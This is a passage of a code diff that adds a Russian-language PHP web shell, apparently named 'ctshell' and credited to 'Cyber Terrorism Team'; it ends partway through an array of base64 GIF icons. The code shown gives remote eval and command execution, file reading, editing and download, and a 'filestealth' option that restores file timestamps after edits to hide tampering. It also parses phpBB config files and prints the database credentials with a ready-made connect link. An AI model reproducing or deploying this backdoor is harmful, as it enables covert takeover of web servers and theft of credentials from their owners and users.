+ echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Âûïîëíèòü\"></form>";
+}
+if ($act == "f")
+{
+ $r = @file_get_contents($d.$f);
+ if (!is_readable($d.$f) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$sul."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v)
+  {
+if (in_array($ext,$v)) {$rft = $k; break;}
+  }
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+
+  echo "<b>Ğàññìîòğåíèå ôàéëà:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$sul."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  if (is_writable($d.$f)) {echo "<font color=\"green\">Ïîëíûé äîñòóï ÷òåíèÿ/çàïèñè (".view_perms(fileperms($d.$f)).")</font>";}
+  else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";}
+ 
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+echo "<b>Information:</b>";
+echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>";
+echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+if (!$win)
+{
+ echo "<tr class=tr><td><b>Owner/Group</b></td><td> ";
+ $tmp=posix_getpwuid(fileowner($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+ else echo $tmp['name']." ";
+ $tmp=posix_getgrgid(filegroup($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+ else echo $tmp['name'];
+}
+echo "<tr class=tr><td><b>Perms</b></td><td>";
+
+if (is_writable($d.$f))
+{
+ echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>";
+}
+else
+{
+ echo "<font>".view_perms(fileperms($d.$f))."</font>";
+}
+
+echo "</td></tr>";
+echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+echo "</table><br>";
+
+
+$fi = fopen($d.$f,"rb");
+if ($fi)
+{
+ if ($fullhexdump)
+ {
+  echo "<b>FULL HEXDUMP</b>";
+  $str=fread($fi,filesize($d.$f));
+ }
+ else
+ {
+  echo "<b>HEXDUMP PREVIEW</b>";
+  $str=fread($fi,$hexdump_lines*$hexdump_rows);
+ }
+ $n=0;
+ $a0="00000000<br>";
+ $a1="";
+ $a2="";
+ for ($i=0; $i<strlen($str); $i++)
+ {
+  $a1.=sprintf("%02X",ord($str[$i])).' ';
+  switch (ord($str[$i]))
+  {
+case 0:  $a2.="<font class=s2>0</font>"; break;
+case 32: 
+case 10:
+case 13: $a2.="&nbsp;"; break;
+default:  $a2.=htmlspecialchars($str[$i]);
+  }
+  $n++;
+  if ($n == $hexdump_rows)
+  {
+$n = 0;
+if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";}
+$a1.="<br>";
+$a2.="<br>";
+  }
+ }
+ echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ".
+"class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>".
+"$a1</td><td bgcolor=000000>$a2</td></tr></table><br>";
+}
+$encoded = "";
+if ($base64 == 1)
+{
+ echo "<b>Base64 Encode</b><br>";
+ $encoded = base64_encode($r);
+}
+elseif($base64 == 2)
+{
+ echo "<b>Base64 Encode + Chunk</b><br>";
+ $encoded = chunk_split(base64_encode($r));
+}
+elseif($base64 == 3)
+{
+ echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+ $encoded = base64_encode($r);
+ $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+}
+elseif($base64 == 4)
+{
+}
+if (!empty($encoded))
+{
+ echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+}
+echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+if ($white) {@ob_clean();}
+echo $r;
+if ($white) {exit;}
+  }
+  elseif ($ft == "txt")
+  {
+echo "<pre>".htmlspecialchars($r)."</pre>";
+  }
+  elseif ($ft == "ini")
+  {
+echo "<pre>";
+var_dump(parse_ini_file($d.$f,true));
+echo "</pre>";
+  }
+  elseif ($ft == "phpsess")
+  {
+echo "<pre>";
+$v = explode("|",$r);
+echo $v[0]."<br>";
+var_dump(unserialize($v[1]));
+echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>";
+  }
+  elseif ($ft == "sdb")
+  {
+echo "<pre>";
+var_dump(unserialize(base64_decode($r)));
+echo "</pre>";
+  }
+  elseif ($ft == "code")
+  {
+if (ereg("phpBB 2.(.*) auto-generated config file",$r))
+{
+ $arr = explode("
+",$r);
+ if (count($arr == 18))
+ {
+  include($d.$f);
+  echo "<b>phpBB configuration is detected in this file!<br>";
+  if ($dbms == "mysql4") {$dbms = "mysql";}
+  if ($dbms == "mysql") {echo "<a href=\"".$sul."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+  else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ctshell";}
+  echo "Parameters for manual connect:<br>";
+  $cfgvars = array(
+  "dbms"=>$dbms,
+  "dbhost"=>$dbhost,
+  "dbname"=>$dbname,
+  "dbuser"=>$dbuser,
+  "dbpasswd"=>$dbpasswd 
+  );
+  foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+ 
+  echo "</b>";
+  echo "<hr size=\"1\" noshade>";
+ }
+}
+echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">";
+if (!empty($white)) {@ob_clean();}
+if ($rehtml) {$r = rehtmlspecialchars($r);} 
+$r = stripslashes($r); 
+$strip = false;
+if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;}
+$r = @highlight_string($r, TRUE); 
+if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);}
+echo $r;
+if (!empty($white)) {exit;}
+echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+@ob_clean();
+header("Content-type: ctshell");
+header("Content-disposition: attachment; filename=\"".$f."\";"); 
+echo($r); 
+exit;
+  }
+  elseif ($ft == "notepad")
+  {
+@ob_clean();
+header("Content-type: text/plain"); 
+header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+echo($r); 
+exit;
+  }
+  elseif ($ft == "img")
+  {
+if (!$white)
+{
+ echo "<center><img src=\"".$sul."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>";
+}
+else
+{
+ @ob_clean();
+ $ext = explode($f,".");
+ $ext = $ext[count($ext)-1];
+ header("Content-type: image/gif"); 
+ echo($r); 
+ exit;
+}
+  }
+  elseif ($ft == "edit")
+  {
+if (!empty($submit))
+{
+ if ($filestealth) {$stat = stat($d.$f);}
+ if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);}
+ $fp = fopen($d.$f,"w");
+ if (!$fp) {echo "<b>Can't write to file!</b>";}
+ else
+ {
+  echo "<b>Ñîõğàí¸íü!!!</b>";
+  fwrite($fp,$nfcontent);
+  fclose($fp);
+  if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+  $r = $nfcontent;
+ }
+}
+$rows = count(explode("
+",$r));
+if ($rows < 10) {$rows = 10;}
+if ($rows > 30) {$rows = 30;}
+echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Ñîõğàíèòü\">&nbsp;<input type=\"reset\" value=\"Ñáğîñ\">&nbsp;<br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+if ($act == "phpinfo")
+{
+ ob_end_clean();
+ phpinfo();
+ exit;
+}
+}
+$data = base64_decode("PGNlbnRlcj48Zm9udCBzaXplPTIgY29sb3I9IzAwZmYwMD5DeWJlciBUZXJyb3Jpc20gVGVhbTwvZm9udD48YnI+PGZvbnQgc2l6ZT0yPg0KyOTl/ywg6Ofs5e3l7ej/IOTo5+Dp7eAg6CDx6vDo7/LgIOTu4eDi6Os6PC9mb250PjxpbWcgc3JjPWh0dHA6Ly9vbmxpbmUubWlyYWJpbGlzLmNvbS9zY3JpcHRzL29ubGluZS5kbGw/aWNxPTMzNTk3NjAyMSZpbWc9NSBoZWlnaHQ9MTggd2lkdGg9MTg+PGZvbnQgc2l6ZT0yIGNvbG9yPSNGRkRFMDA+IFJPRE5PQzwvZm9udD48L2NlbnRlcj4=");
+if ($act == "img")
+{
+ @ob_clean();
+ 
+ $arrimg = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhEQAPAKIAAO/v8N3e387OzpSt72NzrVFZfCkxUv///yH5BAUUAAcALAAAAAARAA8AAANSe".
+"Grc3uoYAEq4wWZqFtWXVnBehWUhKQ1V4b6uagwsZd/ATO84ru+0k/C3MxCOSIyDZhQ4nYRnZ2UQRJ9".
+"W6aKaxV4F02r1CwWDF2bYyzyVPN6dBAA7",
+"edit"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhDgAQALMPAKt5E8uYM7SBHLyJJMaTLsGOKaRyDJ5sBv/MZ//////ge//rhf/Ub//3kf//m".
+"f///yH5BAEAAA8ALAAAAAAOABAAAARF8MlJq704axo6yUEiJsUVOqiTDIPgSkEjz6MIPMGi7/xyE4q".
+"gcKj4MY7IJONWQDifUAQzSr0NqFErFnp7uASAsMFwKD8iADs=",
+"small_unk"=>
+"R0lGODlhEQAUANUhAOXl1c3MzJiYmCkufnoRE83MzTNOoszLzO4jI/HqQIeGh5iYlxZ7PRh8PXLM".
+"2FRVVMvLyzRNofbHPnsRE+bm1QgJCebl1FRUVFVVVIaGh1VVVQcICCoufoaFhYWGhszMzP///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAACEALAAAAAARABQAAAaewJBw".
+"SCwaj0hPZpnxOD2dhdFDsVgBV4tAU+yAvmCwAHQhesNhwQVTFnoVS2gn0/FsIJiht8ORcP4DfxVk".
+"QxkgfIF/gBuEQh6HaF8WjHmOIIYJBF8GIBSUQ49eBAggBg4RniBclo8gE18MDQCDqyGhAFUUuLi0".
+"oCAbFRvAwcCMtWeRYW0hGQcfAc/QBQEFzpUhbBoaGNsP2mtrSOLjSEEAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_ani"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP/////MmczMmf/MzJmZZszMzP//zAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARbEMmJAKC4XhCKvRhABJZgACY4oSR3HmdFcQLndaVK7ziu".
+"VQRBYBAI1IKWYrLIJBhwrBqzOHKCotMRcaCbBrRDz+pLHQ65IWOZKE4Lz+hM5SAcDNoZwOBAINxV".
+"EQA7",
+"ext_asp"=>
